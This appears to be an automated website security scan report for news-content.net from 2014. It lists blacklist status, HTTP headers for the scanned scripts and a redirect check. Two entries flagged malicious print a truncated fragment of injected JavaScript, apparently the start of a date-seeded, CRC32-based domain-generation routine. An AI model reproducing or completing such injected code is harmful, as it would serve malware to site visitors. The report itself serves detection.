Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=news-content.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://news-content.net/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=60 Connection: close Date: Wed, 17 Dec 2014 22:35:15 GMT Location: http://www.news-content.net/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 17 Dec 2014 22:36:15 GMT X-Pingback: http://www.news-content.net/xmlrpc.php X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://www.news-content.net/ | 200 OK Content-Length: 19722 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,3 Antivirus reports: | ||
http://www.news-content.net/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://www.news-content.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.news-content.net/wp-content/themes/ifeature/cyberchimps/lib/js/gallery-lightbox.min.js?ver=1.0 | 200 OK Content-Length: 292 Content-Type: application/javascript | clean |
http://www.news-content.net/wp-content/themes/ifeature/cyberchimps/lib/js/jquery.slimbox.min.js?ver=1.0 | 200 OK Content-Length: 4129 Content-Type: application/javascript | clean |
http://www.news-content.net/wp-content/themes/ifeature/cyberchimps/lib/js/jquery.jcarousel.min.js?ver=1.0 | 200 OK Content-Length: 16785 Content-Type: application/javascript | clean |
http://www.news-content.net/wp-content/themes/ifeature/cyberchimps/lib/js/jquery.mobile.custom.min.js?ver=3.9.3 | 200 OK Content-Length: 6127 Content-Type: application/javascript | clean |
http://www.news-content.net/wp-content/themes/ifeature/cyberchimps/lib/js/swipe-call.min.js?ver=3.9.3 | 200 OK Content-Length: 322 Content-Type: application/javascript | clean |
http://www.news-content.net/wp-content/themes/ifeature/cyberchimps/lib/js/core.min.js?ver=3.9.3 | 200 OK Content-Length: 235 Content-Type: application/javascript | clean |
http://www.news-content.net/wp-content/themes/ifeature/elements/lib/js/elements.min.js?ver=3.9.3 | 200 OK Content-Length: 465 Content-Type: application/javascript | clean |
http://www.news-content.net/wp-content/plugins/cforms/js/cforms.js | 200 OK Content-Length: 17787 Content-Type: application/javascript | clean |
http://w.sharethis.com/button/buttons.js | 200 OK Content-Length: 150720 Content-Type: application/x-javascript | clean |
http://www.news-content.net/wp-content/themes/ifeature/cyberchimps/lib/bootstrap/js/bootstrap.min.js?ver=2.0.4 | 200 OK Content-Length: 34982 Content-Type: application/javascript | clean |
http://www.news-content.net/wp-content/themes/ifeature/cyberchimps/lib/js/retina-1.1.0.min.js?ver=1.1.0 | 200 OK Content-Length: 2404 Content-Type: application/javascript | clean |
http://news-content.net/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 17 Dec 2014 22:35:19 GMT Pragma: no-cache Location: http://www.news-content.net/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.news-content.net/xmlrpc.php X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://www.news-content.net/test404page.js | 404 Not Found Content-Length: 17181 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,3 Antivirus reports: |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: news-content.net
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=60
Connection: close
Date: Wed, 17 Dec 2014 22:35:15 GMT
Location: http://www.news-content.net/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 17 Dec 2014 22:36:15 GMT
X-Pingback: http://www.news-content.net/xmlrpc.php
X-Powered-By: PHP/5.3.3-7+squeeze19
...0 bytes of data.
GET / HTTP/1.1
Host: news-content.net
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=60
Connection: close
Date: Wed, 17 Dec 2014 22:35:15 GMT
Location: http://www.news-content.net/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 17 Dec 2014 22:36:15 GMT
X-Pingback: http://www.news-content.net/xmlrpc.php
X-Powered-By: PHP/5.3.3-7+squeeze19
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: news-content.net
Referer: http://www.google.com/search?q=news-content.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: news-content.net
Referer: http://www.google.com/search?q=news-content.net
Result:
The result is similar to the first query. There are no suspicious redirects found.